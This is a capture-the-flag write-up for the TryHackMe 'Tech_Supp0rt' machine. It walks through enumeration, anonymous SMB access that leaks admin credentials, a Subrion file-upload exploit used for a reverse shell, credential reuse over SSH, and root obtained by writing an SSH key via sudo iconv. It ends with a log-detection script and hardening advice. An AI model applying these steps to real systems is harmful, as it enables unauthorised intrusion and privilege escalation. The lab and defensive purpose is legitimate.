Writeup - Tech_Supp0rt: 1 (THM)


This is a writeup for the Tech_Supp0rt machine from the TryHackMe site.

Enumeration

First, let’s start with a scan of our target with the following command:

nmap -sV -T4 -Pn 10.10.222.86

Four TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.2p2)
  • 80/tcp : HTTP web server (Apache 2.4.18)
  • 139/tcp : Samba (3.X - 4.X)
  • 445/tcp : Samba (3.X - 4.X)

Exploit

I start by scanning the site's folders.

We find 2 interesting files:

After some research on the two sites, I decide to look at the SMB server. For that I first try to connect anonymously.

It works, and I can retrieve an enter.txt file.

GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

In this file we learn of the existence of another site in the Subrion folder, and in addition we are given credentials for it. After testing, the password does not seem to work as-is. So I scan the folder to see if I can find something interesting:

A robots.txt file but nothing special in it:

User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/

So I try to decode the password with CyberChef. As soon as I paste in the string of characters, CyberChef decodes it to the following:

So I try to use this password.

Now that I am logged in and know the Subrion version, I start looking for exploits that would give a reverse shell.

┌──(d3vyce㉿kali)-[~]
└─$ searchsploit subrion 4.2.1
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting                           | php/webapps/47469.txt
Subrion CMS 4.2.1 - 'avatar[path]' XSS                                            | php/webapps/49346.txt
Subrion CMS 4.2.1 - Arbitrary File Upload                                         | php/webapps/49876.py
Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)                  | php/webapps/50737.txt
Subrion CMS 4.2.1 - Cross-Site Scripting                                          | php/webapps/45150.txt
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

I quickly find an arbitrary file upload exploit that should give a reverse shell. I save it with the following command:

searchsploit -x php/webapps/49876.py > exploit.py

Then I run it with the following command:

Another way to get a reverse shell would have been to use the upload page found under Content -> Upload in the admin panel. While trying this, I noticed that a file with the .php extension is refused but the .phar version is accepted:

Searching the filesystem, I find that the first flag belongs to the user scamsite. So I go to the WordPress folder to see if the configuration files contain anything useful:

[...]
/** MySQL database username */
define( 'DB_USER', 'support' );

/** MySQL database password */
define( 'DB_PASSWORD', 'ImAScammerLOL!123!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
[...]

So I try to connect via SSH with this password and it works. So I can recover the first flag.

Privilege escalation

I start by looking at the sudo permissions:

My user is allowed to run the iconv command as root, so I look up that binary on the GTFOBins site: iconv.

With this command it is possible to write to an arbitrary file as root. I pipe the contents of my public RSA key into root's authorized_keys so that I can connect over SSH:

cat id_rsa.pub | sudo iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys

I now have a root shell and can retrieve the last flag.
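As an added example (not part of the original writeup), here is a small Python check a defender could run over the sudo records in auth.log to catch exactly the kind of root file write used above: it parses standard sudo log lines and flags file-writing binaries such as iconv when a sensitive path appears among their arguments. The hostname, timestamps and sample lines are constructed; the username scamsite and the iconv command are the ones from this writeup.

```python
import re

# Default sudo syslog record (assumption: sudo logs to /var/log/auth.log as on
# Ubuntu 16.04). Hostname and timestamps in the samples below are constructed.
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+)\s*:\s*TTY=\S+\s*;\s*PWD=\S+\s*;"
    r"\s*USER=(?P<target>\S+)\s*;\s*COMMAND=(?P<cmd>.*)$"
)
# Paths a sudo-run command should essentially never write to.
SENSITIVE_PATHS = ("/root/.ssh/authorized_keys", "/etc/sudoers", "/etc/shadow")
# Binaries that, run as root, can write an arbitrary path (iconv -o is the one
# abused in this writeup; the others are common GTFOBins file-write entries).
FILE_WRITE_BINS = {"iconv", "tee", "cp", "mv", "dd"}

# Constructed sample: the iconv write from the writeup, a benign iconv run,
# and an unrelated sudo command.
SAMPLE_LOG = [
    "Sep  1 10:01:02 techsupport sudo: scamsite : TTY=pts/0 ; PWD=/home/scamsite ;"
    " USER=root ; COMMAND=/usr/bin/iconv -f 8859_1 -t 8859_1 -o /root/.ssh/authorized_keys",
    "Sep  1 10:01:05 techsupport sudo: scamsite : TTY=pts/0 ; PWD=/home/scamsite ;"
    " USER=root ; COMMAND=/usr/bin/iconv -f 8859_1 -t utf-8 -o /tmp/out.txt",
    "Sep  1 10:02:00 techsupport sudo: admin : TTY=pts/1 ; PWD=/root ; USER=root ;"
    " COMMAND=/bin/ls /root",
]

def parse_sudo_line(line):
    """Return the sudo record fields as a dict, or None for non-sudo lines."""
    m = SUDO_RE.search(line)
    return m.groupdict() if m else None

def flag_sudo_file_write(line):
    """Return a finding string when a root sudo command uses a file-writing
    binary with a sensitive path as an argument, else None."""
    rec = parse_sudo_line(line)
    if rec is None or rec["target"] != "root":
        return None
    argv = rec["cmd"].split()
    binary = argv[0].rsplit("/", 1)[-1] if argv else ""
    if binary not in FILE_WRITE_BINS:
        return None
    hit = next((p for p in SENSITIVE_PATHS if p in argv[1:]), None)
    return f"{rec['user']} wrote {hit} via sudo {binary}" if hit else None

def scan(lines):
    """Run the check over an iterable of log lines and collect the findings."""
    return [f for f in map(flag_sudo_file_write, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("ALERT:", finding)
```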

Recommendations

To harden this host, I think the following actions would be necessary:

  • Do not allow anonymous access to an SMB server
  • Do not leave passwords in accessible files
  • Do not grant sudo root rights to binaries unless it is strictly necessary
